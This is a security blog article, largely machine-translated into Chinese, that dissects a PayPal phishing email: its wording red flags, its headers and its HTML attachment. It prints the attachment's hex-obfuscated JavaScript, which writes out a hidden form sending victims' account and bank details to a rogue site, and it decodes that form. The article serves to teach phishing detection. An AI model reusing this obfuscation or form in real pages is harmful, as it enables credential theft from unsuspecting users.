In today’s world where everyone’s information is online, phishing is one of the most popular and devastating online attacks, because you can always clean a virus, but if your banking details are stolen, you’re in trouble. Here’s a breakdown of one such attack we received.

不要认为只有你的银行信息才是重要的：毕竟，如果有人控制了你的帐户登录，他们不仅知道该帐户中包含的信息，而且很有可能相同的登录信息会被用于其他各种帐户。如果他们泄露了你的电子邮件帐户，他们可以重置你的所有其他密码。

因此，除了保持强大和不同的密码，你必须时刻警惕伪装成真品的虚假电子邮件。虽然大多数网络钓鱼尝试是业余的，一些是相当有说服力的，所以重要的是要了解如何识别他们在表面水平，以及他们如何在引擎盖下工作。

阿西拉普图片

什么是一目了然(in plain sight)？

我们的示例电子邮件与大多数网络钓鱼尝试一样，“通知”您贝宝帐户上的活动，在正常情况下，这将是令人震惊的。因此，行动的要求是通过提交你能想到的每一条个人信息来验证/恢复你的账户。同样，这是相当公式化的。

当然也有例外，几乎每一封网络钓鱼和诈骗邮件都会直接在邮件中加载红旗。即使文字是令人信服的，你通常可以发现许多错误散落在整个邮件正文，这表明该邮件是不合法的。

消息正文

乍一看，这是我见过的最好的网络钓鱼邮件之一。这里没有拼写或语法错误，而且逐字逐句都是按照你的预期来读的。但是，当您更仔细地检查内容时，可以看到一些危险信号。

• “Paypal”–正确的大小写是“Paypal”（大写P）。您可以看到消息中使用了这两种变体。公司对他们的品牌非常谨慎，所以像这样的东西能否通过打样过程是值得怀疑的。
• “允许ActiveX”-有多少次你见过像Paypal这样规模的合法网络企业使用只在一个浏览器上工作的专有组件，特别是当它们支持多个浏览器时？当然，在外面的某个地方有公司这么做，但这是个危险信号。
• 注意这个词在页边空白处与段落正文的其余部分没有对齐。即使我把窗户拉长一点，它也不能正确地包裹或隔开。
• “贝宝！“–感叹号前的空格看起来很尴尬。只是另一个怪癖，我肯定不会在一个合法的电子邮件。
• “PayPal-帐户更新表格.pdf.htm–为什么Paypal会附加一个“PDF”，尤其是当他们可以链接到他们网站上的一个页面时？另外，他们为什么要把HTML文件伪装成PDF呢？这是其中最大的危险。

消息头

当您查看消息头时，会出现更多的红色标志：

• 发件人地址为[email protected]。
• 找不到收件人地址。我没有把它删掉，它根本不是标准消息头的一部分。通常一家有你名字的公司会对你的邮件进行个性化设置。

附件

当我打开附件时，您可以立即看到布局不正确，因为它缺少样式信息。再说一次，当贝宝可以简单地在他们的网站上给你一个链接的时候，为什么要用电子邮件发送一个HTML表单呢？

注意：我们使用了Gmail内置的HTML附件查看器，但是我们建议你不要打开骗子的附件。从未。永远不会。他们经常包含漏洞，将安装特洛伊木马在您的电脑上窃取您的帐户信息。

再向下滚动一点，你可以看到这个表单不仅要求我们的贝宝登录信息，但银行和信用卡信息以及。有些图像被破坏了。

很明显，这种网络钓鱼的企图是一蹴而就。

技术故障

虽然很明显这是一个网络钓鱼的企图，但我们现在要分析一下电子邮件的技术组成，看看能找到什么。

附件中的信息

首先要看附件表单的HTML源代码，它将数据提交到伪站点。

快速查看源代码时，所有链接都显示为有效，因为它们指向贝宝网“或”paypalobjects.com“都是合法的。

现在我们来看看Firefox在页面上收集的一些基本页面信息。

如您所见，一些图形是从域中提取的“blessedtobe.com网站”, “好健康药房网“和”图片-上传.de“而不是合法的贝宝域名。

邮件头中的信息

接下来我们将看看原始的电子邮件消息头。Gmail通过邮件上的Show Original菜单选项提供这一功能。

查看原始邮件的标题信息，可以看到此邮件是使用outlookexpress6编写的。我怀疑PayPal的员工中是否有人通过过时的电子邮件客户端手动发送这些消息。

现在查看路由信息，我们可以看到发送者和中继邮件服务器的IP地址。

“用户”IP地址是原始发件人。快速查找IP信息，我们可以看到发送IP在德国。

当我们看到中继邮件服务器的(邮件.itak.at)，IP地址我们可以看到这是一个基于奥地利的ISP。我怀疑贝宝直接通过奥地利的ISP发送电子邮件，因为他们有一个庞大的服务器场，可以很容易地处理这项任务。

数据到哪里去了？

因此，我们已经明确确定这是一封网络钓鱼邮件，并收集了一些有关邮件来源的信息，但您的数据是从哪里发送的呢？

要看到这一点，我们必须先将HTM附件保存到桌面上，然后在文本编辑器中打开。滚动浏览它，除了看到一个可疑的Javascript块外，其他一切看起来都井然有序。

打开最后一块Javascript的完整源代码，我们看到：

<script language=”JavaScript” type=”text/javascript”> // Copyright © 2005 Voormedia – WWW.VOORMEDIA.COM var i,y,x=”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”;y=”;for(i=0;i<x.length;i+=2){y+=unescape(‘%’+x.substr(i,2));}document.write(y); </script>

每当你看到一个巨大的乱七八糟的字符串似乎随机字母和数字嵌入在一个Javascript块，它通常是可疑的东西。查看代码，变量“x”被设置为这个大字符串，然后被解码为变量“y”。变量“y”的最终结果将作为HTML写入文档。

由于大字符串由数字0-9和字母a-f组成，因此很可能通过简单的ASCII到十六进制转换进行编码：

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

转换为：

<form name=”main” id=”main” method=”post” action=”http://www.dexposure.net/bbs/data/verify.php”>

这并不是一个巧合，这解码成一个有效的HTML表单标签，发送结果不是贝宝，而是一个流氓网站。

此外，当您查看表单的HTML源代码时，您将看到此表单标记不可见，因为它是通过Javascript动态生成的。如果有人只是简单地查看附件的生成源（正如我们之前所做的那样），而不是直接在文本编辑器中打开附件，那么这是一种隐藏HTML实际操作的聪明方法。

在违规网站上快速运行whois，我们可以看到这是一个托管在流行web主机1和1上的域。

最突出的是域使用可读的名称（与类似“dfh3”的名称相反）sjhskjhw.net网站）并且该域已注册4年。正因为如此，我相信这个域名被劫持，并作为一个棋子在这个网络钓鱼企图。

玩世不恭是很好的辩护

说到安全上网，有点玩世不恭是没有坏处的。

虽然我确信示例电子邮件中有更多的危险信号，但我们上面指出的是我们在几分钟的检查后看到的指标。假设，如果邮件的表层100%地模仿了它的合法副本，那么技术分析仍然可以揭示它的真实本质。这就是为什么能够同时检查你能看到和看不到的东西是重要的。